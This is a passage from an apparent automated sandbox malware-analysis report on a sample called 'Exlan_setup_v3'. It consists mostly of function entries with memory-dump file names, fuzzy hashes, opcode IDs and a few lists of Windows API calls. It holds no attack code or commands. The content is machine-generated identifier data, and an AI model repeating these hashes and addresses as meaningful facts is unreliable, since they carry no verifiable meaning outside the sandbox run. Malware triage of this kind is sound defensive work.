Instruction Fuzzy Hash: B411BF76504280CFDB16CF54D9C4B1ABFB1FB84314F28C6AAD9494F656C33AD41ACBA2

Function 058035C8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de40c1b7516f8771de5ff7a1f8f84ed2e62c3b41bad14d412c5d577d12784ee0
Instruction ID: 30415b206f13d54a9aef2f216535f375b8845646df662c2001e511387212463f
Opcode Fuzzy Hash: de40c1b7516f8771de5ff7a1f8f84ed2e62c3b41bad14d412c5d577d12784ee0
Instruction Fuzzy Hash: D41106309092848FDB42CB39DC057EA7FB2EB82204F0894B6D915C72D1DA349905DB41

Function 058033D8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef769f6df8b48eebc4ffb4eb2964c7a845b14b6830ddbf24c555578e96d0419
Instruction ID: 741e90db9194b6c04e86d2c2c85353faa6b044f8ee832703c9be5b70dd92d82b
Opcode Fuzzy Hash: 8ef769f6df8b48eebc4ffb4eb2964c7a845b14b6830ddbf24c555578e96d0419
Instruction Fuzzy Hash: 4A1182313015048BC381D61EE88477A76DBF7C5614F65987AD816CB2D4DE79DC868B82

Function 0153D447 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673449807.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad62efa7e34eb6ffca8f9af0f1caae2cb21745ce108d27b5cb127a1fad79872
Instruction ID: 02fd24020794733d5abfe4ff03876a9316522df4341e5cfb91bfe49691bdbd1e
Opcode Fuzzy Hash: aad62efa7e34eb6ffca8f9af0f1caae2cb21745ce108d27b5cb127a1fad79872
Instruction Fuzzy Hash: C3119175504284DFDB12CF14D5C4B5AFF71FB84328F24C6AAD8494B656C33AE44ACBA2

Function 058021C0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5159446fea45e3433243170038e7bc585d4c59725da49484f9540443656a78bc
Instruction ID: 6230d2b0a51cb9823a9dc27a5517fb0f1e1208c924641f3dae1dc4dc12b2f8b5
Opcode Fuzzy Hash: 5159446fea45e3433243170038e7bc585d4c59725da49484f9540443656a78bc
Instruction Fuzzy Hash: 2101D831B0021A5BC704DEAADD80A6FF7ABBFD8210F244029D915A7384CE719D0683A1

Function 05800868 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d26350ff1b720dc190c02bbc9f026d6ae30fcf0071c04054bf875c30695646
Instruction ID: ba970892effc962d6f15e5860c7fd337785458b8ccc63f2a442fc3a8bd887630
Opcode Fuzzy Hash: c5d26350ff1b720dc190c02bbc9f026d6ae30fcf0071c04054bf875c30695646
Instruction Fuzzy Hash: 9E01DF313102189BD718ABA8EC48BAE7BA9BF84710F144029F205872D0CFB55C40C7A0

Function 06B7EEC8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbdec689c2701ff986f6aabffa0abf71e576428d721b9b33d80eb185f058774
Instruction ID: 40f22428c79be887cf22dbce1ccad2204bea36fea456790b458d4a56c25018ba
Opcode Fuzzy Hash: 7dbdec689c2701ff986f6aabffa0abf71e576428d721b9b33d80eb185f058774
Instruction Fuzzy Hash: E511B7B0E0021A9FCB84DFA9C9456AEBBF5FF88300F20846AD518A7354DA359A418B91

Function 0152D041 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673425268.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_152d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a02d8db7ff5e68ad75917e5fb83c6ce66f7cbb0b4a364892ba5be674ae076050
Instruction ID: bfc59af17106003fecbb04a79772051e67d22e28936860f06d0472c374472577
Opcode Fuzzy Hash: a02d8db7ff5e68ad75917e5fb83c6ce66f7cbb0b4a364892ba5be674ae076050
Instruction Fuzzy Hash: EF01FC320083549AE7114A69C9C476BBFF8FF42360F18C515ED484E2D7E23D9841C6B1

Function 05803A08 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b189e7f7c8056cab64aec204e63a79412dfb8b089e4860423ef0ebd1c9c911
Instruction ID: c684902e69e1e2eef03abf7777694eea0a041e2c6a8ba8443f71b29d20e3b2c4
Opcode Fuzzy Hash: 10b189e7f7c8056cab64aec204e63a79412dfb8b089e4860423ef0ebd1c9c911
Instruction Fuzzy Hash: EA01F2347096408FE355CB28DD56B613BA2AF85314F2880FAE40ACB2E2DE789C42CB01

Function 0152D040 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673425268.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_152d000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720526cebaed59b4b4b095b9eb545d10da5100417c3064f960cf65bbb12c5af6
Instruction ID: e603701e1752b715d82ae87551d92c8c60672b2ffce48fffcb46217a5890a0ee
Opcode Fuzzy Hash: 720526cebaed59b4b4b095b9eb545d10da5100417c3064f960cf65bbb12c5af6
Instruction Fuzzy Hash: 3FF0C2720083849EE7118A1AC8C4B66FFE8EB81764F18C45AED080E2D7D2799841CAB1

Function 05803678 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05aacf348ff5e24c9d1ccc34858806785e60df0a3a43b272243579cd350b81c
Instruction ID: 83e52531b4d7a20b775ad0fe6bb6b2402549542997524a0aaca62c178577b32c
Opcode Fuzzy Hash: c05aacf348ff5e24c9d1ccc34858806785e60df0a3a43b272243579cd350b81c
Instruction Fuzzy Hash: 7CF062712192845FC382DB28DC58B153FB5BB5A224F1984EBD448CB3A3DB29DC45C756

Function 05803A28 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee6057bdc2b837934dd76c123b1d5377dabcb0a2983f7d8aba525cc0107ff09c
Instruction ID: 53bc8e329ae73ec1271e913ef0d86b06e5300ed11e51d844f36c2a749c879e69
Opcode Fuzzy Hash: ee6057bdc2b837934dd76c123b1d5377dabcb0a2983f7d8aba525cc0107ff09c
Instruction Fuzzy Hash: F0F090303456149FD358CA29DC52B1673A7EB88304F2884B9E90ACB6E0DEB5EC42CB80

Function 058035E8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c4c0ff4cb6decaff296db7658fde410afd69ac6076b7fe164dd988b6546a7b
Instruction ID: ea38927397455ee6e3a10bee7edbd1b47d14a3064af29dc434a37204eeee69a9
Opcode Fuzzy Hash: b0c4c0ff4cb6decaff296db7658fde410afd69ac6076b7fe164dd988b6546a7b
Instruction Fuzzy Hash: 0EF04F30E05209CBDB44CF59D90A7AABBB3EB84305F04D476D92AD2294DF74AD42EF42

Function 0580364F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9fa906506ec79a9b428e267ed7914cc2f8c052f7300b5bd7f549f79ea982cd
Instruction ID: 571d6bb5048ee1880e30eb6b15117895b6cec073f86d77788e6f446930e83d1e
Opcode Fuzzy Hash: 4f9fa906506ec79a9b428e267ed7914cc2f8c052f7300b5bd7f549f79ea982cd
Instruction Fuzzy Hash: DDF0EC70A06209CFD794CF59EA49BA9BBB3EB80309F089471D92AC6290DF74DD41EF01

Function 06B67B19 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ce285110f3aa20d7ac376e95573e8c0bb8db8cd19db8460f1286ceb7c07b89
Instruction ID: 343bd9e06ffd3ad92a4e25ac75b1cb35f45d443eaf26cd22f508847b660dc649
Opcode Fuzzy Hash: a3ce285110f3aa20d7ac376e95573e8c0bb8db8cd19db8460f1286ceb7c07b89
Instruction Fuzzy Hash: 5CF03AB8A42129DFDB94DF55C998AAABBB1FF49304F1040D5E90A97391CB349E82CF40

Function 06B7BE48 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction ID: 5d9273f474b76e3acda17defe444047610620ac26958682e6a3ebafc11d30bec
Opcode Fuzzy Hash: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction Fuzzy Hash: 41E0C974E05208EFCB84DFA8D54169DBBF4EB48314F10C4EAA91993350DA319A51DF80

Function 06B75C70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction ID: 35d8cf176983979e65c9484e84237bfbe3c57378398728f418a8176cd0bb549a
Opcode Fuzzy Hash: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction Fuzzy Hash: A2E0ED74E05208EFCB94DFA8D5416ACFBF4EB48310F10C0AAA818A3340DB319A51DF80

Function 06B7A458 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction ID: debcab8ef5aa2cdcf6d9ed24dc91ab03e096942a89d78e68c47fb9e8cb8fdcf8
Opcode Fuzzy Hash: 61a9051dd96acc7f0a29322d51edc5bb19f4d03620dc915a696faee71e3b3126
Instruction Fuzzy Hash: 3BE0ED74E05208EFCB84DFA8D54569CFBF4FB48310F10C0AAA85893340DA32AA51EF80

Function 05803698 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc65401c10a0d3265269a059217de3fee1b20c4ce72e74d0de2b4b85c135fb1
Instruction ID: ea146e50b713b60882575c91a2cf8683fcb97d74e64e039811be53bc0e34cd06
Opcode Fuzzy Hash: 5bc65401c10a0d3265269a059217de3fee1b20c4ce72e74d0de2b4b85c135fb1
Instruction Fuzzy Hash: 68E04F743111149FC344DB69D4449157BE6FB8D62472080A9EC09C7365DE36DC428B91

Function 06B7FDE8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9626ebe1cef34344d319c4f89a3f06abb8304f72f8cc3f5644addca0205ce880
Instruction ID: 0aee7e3c829173c6feb9b5a68bfb3bf6e374f8ff030aa1318e7ed5aa9a1161a8
Opcode Fuzzy Hash: 9626ebe1cef34344d319c4f89a3f06abb8304f72f8cc3f5644addca0205ce880
Instruction Fuzzy Hash: 73E04FB4909208ABC744DF94D5419BDBFB8EB45310F24D099E94457341CA319A41DB94

Function 06B78A20 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1f63a48ffab5a04c3517d9a065544b313d0a008029e1f2853407f63bd3c896
Instruction ID: aa373a02bec24c29056a6a3e316eb81b3e89802ff3ccb2e1f36479b89473329e
Opcode Fuzzy Hash: 8b1f63a48ffab5a04c3517d9a065544b313d0a008029e1f2853407f63bd3c896
Instruction Fuzzy Hash: C3E04F74D05108EFC744DF98D5456ACFBB4EB89304F10C0EAE85853381CA319A02DB80

Function 06B602C9 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cc762b57c0085e444869b1754964020f4618d750b10f3335d7e290ae6a9a8c
Instruction ID: cdc2d94a69562d100d43fb203fe3072c85908496d465cf8a985364c37c611a31
Opcode Fuzzy Hash: 19cc762b57c0085e444869b1754964020f4618d750b10f3335d7e290ae6a9a8c
Instruction Fuzzy Hash: 11F0A578A421199FD754DF58D998999BBB5FB4C300F1440D5E90997391CB34AE81CF50

Function 06B7DF00 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747a9aaa1a004b4598a76d2b31c0c0dc8e419db36fb3704ac7408b823d90300f
Instruction ID: 01c809996c55a316fdab3dfe050df6a9b5924415c167f525617f849412b69ab6
Opcode Fuzzy Hash: 747a9aaa1a004b4598a76d2b31c0c0dc8e419db36fb3704ac7408b823d90300f
Instruction Fuzzy Hash: DFE01274909108DBCB44DF94E9415ACBBB4EF85314F14D1E9E81817341CA329E42DB81

Function 05803994 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b592774c9564d8c15ba894ab229cdd4cc428ea3de6c9fa2151cf74003a219c02
Instruction ID: 9216f9e3522b4ae89854f717332ceeb35b94ec3c319bd48425c8c1fa442d3f50
Opcode Fuzzy Hash: b592774c9564d8c15ba894ab229cdd4cc428ea3de6c9fa2151cf74003a219c02
Instruction Fuzzy Hash: ECD0922554E7C18FC3534B208965BA23FF05A1711571F80E7C084CB2F3D1584855CB63

Function 05802A19 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c62fb17e2d9336bce52f9a46fc75de71518d2cb911554001f7557c713c475b41
Instruction ID: 598a9c8e9cb422d136c4c6f4b1667f2f70c4275bf7f7ef84575107434d334e4e
Opcode Fuzzy Hash: c62fb17e2d9336bce52f9a46fc75de71518d2cb911554001f7557c713c475b41
Instruction Fuzzy Hash: A0D0A939914520CA9BE8CF06CC080587BB2BB49301342E428DE53A3081CB30FD42DB80

Function 05802C98 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1875c74a067e07f19240e2f25c6c67ee0d6c0d363e03040de0d82a2d76f859ec
Instruction ID: 7aacc42180f068de1692101f5a64eda7d30622c7a64f9dad0f8f0f161037a258
Opcode Fuzzy Hash: 1875c74a067e07f19240e2f25c6c67ee0d6c0d363e03040de0d82a2d76f859ec
Instruction Fuzzy Hash: 4DC01235414124D6EBF49F50DC491B97BB4BB05301B40A409EDA7D1040CF60EE06AB41

Non-executed Functions

Function 6CFC2D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC2DFF
VariantInit.OLEAUT32(?), ref: 6CFC2E08
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFC2E7E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC2EB5
VariantClear.OLEAUT32(?), ref: 6CFC2EC1

Part of subcall function 6CFCC850: VariantInit.OLEAUT32(?), ref: 6CFCC88F
Part of subcall function 6CFCC850: VariantInit.OLEAUT32(?), ref: 6CFCC895
Part of subcall function 6CFCC850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCC8A0
Part of subcall function 6CFCC850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFCC8D5
Part of subcall function 6CFCC850: VariantClear.OLEAUT32(?), ref: 6CFCC8E1

VariantClear.OLEAUT32(?), ref: 6CFC30D5
SafeArrayDestroy.OLEAUT32(?), ref: 6CFC3550
VariantClear.OLEAUT32(?), ref: 6CFC3563
VariantClear.OLEAUT32(?), ref: 6CFC3569

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 5cb8c3ab7500b8cfd7db0e684d18340798c9cb2315bf7957421011860e1ad72a
Instruction ID: c872631c7375206e9239ced20b1e4dec6c63a363541a7c8d691be2dae31f5db9
Opcode Fuzzy Hash: 5cb8c3ab7500b8cfd7db0e684d18340798c9cb2315bf7957421011860e1ad72a
Instruction Fuzzy Hash: A1527B71A01219DFDB04DFA8C884BEEBBB5FF89304F258599E909AB740D730A945CF91

Function 6CFBA0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6D030634,6D030738,?), ref: 6CFBA119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6CFBA145
__cftoe.LIBCMT ref: 6CFBA1FB
GetModuleHandleW.KERNEL32(?), ref: 6CFBA215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6CFBA265

Strings

mscorwks, xrefs: 6CFBA140
v2.0.50727, xrefs: 6CFBA110
wks, xrefs: 6CFBA10B

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 1bcd5b948a4c234ce9d0a209ba073150ed97e9500c40d53e6a527427c95f35cb
Instruction ID: 21c7c8130d48f4d069a1e1e77ed6dd67899f217390d148c6370945e5c036aa71
Opcode Fuzzy Hash: 1bcd5b948a4c234ce9d0a209ba073150ed97e9500c40d53e6a527427c95f35cb
Instruction Fuzzy Hash: 0F917970D052499FDB04DFEAC880A9EBBF5FF49310F24826DE119EB684D731A945CB94

Function 6D00948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D00CE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D00CE81
UnhandledExceptionFilter.KERNEL32(6D029428), ref: 6D00CE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6D00CEA8
TerminateProcess.KERNEL32(00000000), ref: 6D00CEAF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: e8f669b9300b5ab994ba425c29a0c09df31172399b296892eaeb50349b707ae8
Instruction ID: 979a0b1f7da7953f581cd792c954da40ec25532a4f96744211eb4b7ad2ac3817
Opcode Fuzzy Hash: e8f669b9300b5ab994ba425c29a0c09df31172399b296892eaeb50349b707ae8
Instruction Fuzzy Hash: 8021B2B580A204EFEB51EF69D684F8C3BB4FB0A305F10415AE50987B40E7B0A9E0CF56

Function 6CFFDE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(013128B8,?,?,5A45ABCE,00000000), ref: 6CFFDE6F
__CxxThrowException@8.LIBCMT ref: 6CFFDEB9

Part of subcall function 6CFFDD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D01F0E6,000000FF,6CFFDF67,00000000,?), ref: 6CFFDDB4

Strings

CryptGenRandom, xrefs: 6CFFDE7B

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: 6e24f364b7d67bec5c7fd58567e94b2d7c3d9d1eff5f9cd6b37f8d2234a6ee4b
Instruction ID: aab86dde5f4fedf8aa256d6c05e16cdec3991073eb6ea0629dba1f589cf70e40
Opcode Fuzzy Hash: 6e24f364b7d67bec5c7fd58567e94b2d7c3d9d1eff5f9cd6b37f8d2234a6ee4b
Instruction Fuzzy Hash: AF213671108340AFE700EF64C944F9ABBF8FB99718F004A0EF4A583690EB74A548CB92

Function 6CFFD9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,5A45ABCE,75A8FC30,?,00000000), ref: 6CFFDA1A

